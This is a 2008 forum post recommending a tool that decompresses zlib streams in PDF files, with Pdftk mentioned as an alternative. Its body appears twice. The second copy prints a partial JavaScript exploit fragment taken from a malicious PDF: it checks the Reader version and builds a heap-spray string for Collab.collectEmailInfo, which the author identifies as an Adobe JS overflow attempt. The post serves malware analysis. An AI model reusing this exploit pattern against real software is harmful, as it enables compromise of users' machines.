joren
October 3rd, 2008, 12:50
The author of Malzilla released a tool recently titled 'PDF steams inflater'. It takes zlib compressed streams, decompresses them, and reveals the output.
If you open a PDF file in a text editor these areas are denoted like so:
It works quite well, as I threw it a malicious PDF I had and received the following output:
A simple Google search reveals this an attempt at exploiting an overflow vulnerability in Adobe's JS engine. Overall, a great tool that everyone should throw into their arsenal. Original post and download links can be found here ("http://www.woodmann.com/forum/showthread.php?p=77241"). This post was made to bring additional publicity to the tool (better keyword search-engine results) and to inform those who only read the woodmann blogs
Additionally, you can use Pdftk to uncompress page streams as well (support for Linux, Mac OSX, etc). Link is http://www.accesspdf.com ("http://www.accesspdf.com")
If you open a PDF file in a text editor these areas are denoted like so:
Code:
stream
xœ¥Wmoâ:þ¾Òþ‡¨Ò®@3í&tŠz©È
…..
endstream
It works quite well, as I threw it a malicious PDF I had and received the following output:
Code:
....
function evil(){
var b=app.viewerVersion.toString();
b=b.replace(/\D/g,'');
var c = new Array(b.charAt(0),b.charAt(1),b.charAt(2));
if((c[0]==8&&((c[1]==1&&c[2]<2)||c[1]<1))||(c[0]==7&&c[1]<1)||(c[0]<7)){
d();
var e=unescape("%u0c0cఌ";
while(e.length<44952)
e+=e;
this.collabStore=Collab.collectEmailInfo({subj: "",msg: e});
}
}
A simple Google search reveals this an attempt at exploiting an overflow vulnerability in Adobe's JS engine. Overall, a great tool that everyone should throw into their arsenal. Original post and download links can be found here ("http://www.woodmann.com/forum/showthread.php?p=77241"). This post was made to bring additional publicity to the tool (better keyword search-engine results) and to inform those who only read the woodmann blogs
Additionally, you can use Pdftk to uncompress page streams as well (support for Linux, Mac OSX, etc). Link is http://www.accesspdf.com ("http://www.accesspdf.com")